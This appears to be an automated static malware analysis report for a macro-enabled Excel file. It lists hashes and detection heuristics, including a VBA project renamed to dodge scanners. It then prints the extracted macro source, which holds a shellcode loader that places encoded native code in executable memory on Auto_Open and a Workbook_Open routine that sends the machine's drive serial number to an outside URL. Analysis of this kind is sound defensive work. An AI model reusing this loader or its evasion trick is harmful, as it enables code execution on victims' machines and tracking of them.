Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 b2b80939a83ad7ec…

MALICIOUS

Office (OOXML) / .XLSX

200.2 KB Created: 2022-04-14 12:05:31 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-06
MD5: 71b153f5d0b27dea7ecdcbb547ec241e SHA-1: 32297d2c4534a75b634c5ee580d8a1d9f5ef29b1 SHA-256: b2b80939a83ad7ecd7330507313cb85f78c8cad4f446f67a49ed994fcc93dbaa
126 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objFS = CreateObject("Scripting.FileSystemObject")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://ad.worksheets.co.kr/?WsLn=54a5e633807f3ba4622685fc9f8c8caf
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://ad.worksheets.co.kr/?WsLn=54a5e633807f3ba4622685fc9f8c8caf Document hyperlink
    • https://ad.worksheets.co.kr/?WsLn=59b586058f06393d086f3f2d41438bb5&WsMm=In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8686 bytes
SHA-256: 1446591b5804586d8098a3f0e045e8b2b989dba5b7bdbacca3ac8dd0987a163a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "mAPI"
Option Explicit

'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------

Private Const OPTION_BASE                  As Long = 0
Private Const OPTION_FLAGS                 As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES       As String = ""
Private Const PAGE_EXECUTE_RW              As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT       As Long = &H3000
Private Const MEM_RELEASE                  As Long = &H8000
Private Const ERR_OUT_OF_MEMORY            As Long = &H7
Private Const ROOTOBJECT_SIZE              As Long = &H4D948

Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object

#If VBA7 = False Then
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
    Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
    Private Const VBA_VERSION              As Long = 6

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As Long
        vtbl_AddRef As Long
        vtbl_Release As Long
        vtbl_GetTypeInfoCount As Long
        vtbl_GetTypeInfo As Long
        vtbl_GetIDsOfNames As Long
        vtbl_Invoke As Long
        RootObjectMem As Long
        HelperObject As Object
        SysFreeString As Long
        GetProcAddress As Long
        NativeCode As String
        LoaderMem As Long
        IgnoreFlag As Boolean
        VTablePtr As Long
        Kernel32Handle As Long
        RootObject As Object
        ClassFactory As Object
    End Type
#Else
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
    Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
    Private Const VBA_VERSION              As Long = 7

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As LongPtr
        vtbl_AddRef As LongPtr
        vtbl_Release As LongPtr
        vtbl_GetTypeInfoCount As LongPtr
        vtbl_GetTypeInfo As LongPtr
        vtbl_GetIDsOfNames As LongPtr
        vtbl_Invoke As LongPtr
        RootObjectMem As LongPtr
        HelperObject As Object
        SysFreeString As LongPtr
        GetProcAddress As LongPtr
        NativeCode As String
        LoaderMem As LongPtr
        IgnoreFlag As Boolean
        VTablePtr As LongPtr
        Kernel32Handle As LongPtr
        RootObject As Object
        ClassFactory As Object
    End Type
#End If

Public Sub Auto_Open()

    With m_Loader
        .NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$(  XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8  XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"

        .LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .vtbl_QueryInterface = .LoaderMem
        .VTablePtr = VarPtr(m_Loader)
        .Kernel32Handle = GetModuleHandleA("KERNEL32")
        .GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
        .SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
        Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
        Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
        .IgnoreFlag = TypeOf .RootObject Is VBA.Collection
        Set .ClassFactory = (.RootObject)
        Set .RootObject = Nothing
        VirtualFree .LoaderMem, 0, MEM_RELEASE
        Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
        Set m_VCOMObject = .ClassFactory.GetErrEx()
    End With

End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Dim objFS As Object
    On Error GoTo ExitSub
    Set objFS = CreateObject("Scripting.FileSystemObject")
    If Sheet3.[a1] <> objFS.getfile(ThisWorkbook.FullName).datecreated Then
        ThisWorkbook.FollowHyperlink "https://ad.worksheets.co.kr/?WsLn=59b586058f06393d086f3f2d41438bb5&WsMm=" & objFS.getdrive(objFS.getdrivename(Application.Path)).SerialNumber
        Sheet3.[a1] = objFS.getfile(ThisWorkbook.FullName).datecreated
    End If
ExitSub:
    Set objFS = Nothing
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F57D9841-60DB-4718-A50A-5874AA58AC20}{B9F8A873-C38F-4311-A5D7-D4127C25D2BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 7680 bytes
SHA-256: 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861
vbaProject_01.bin vba-project OOXML VBA project: xl/printerSettings.bin 28160 bytes
SHA-256: 850a6905f18f14ff7a3001153e89ffd22fee9a7a62d5cda389005a632976076a

Open this report in the interactive analyzer, or submit your own file for analysis.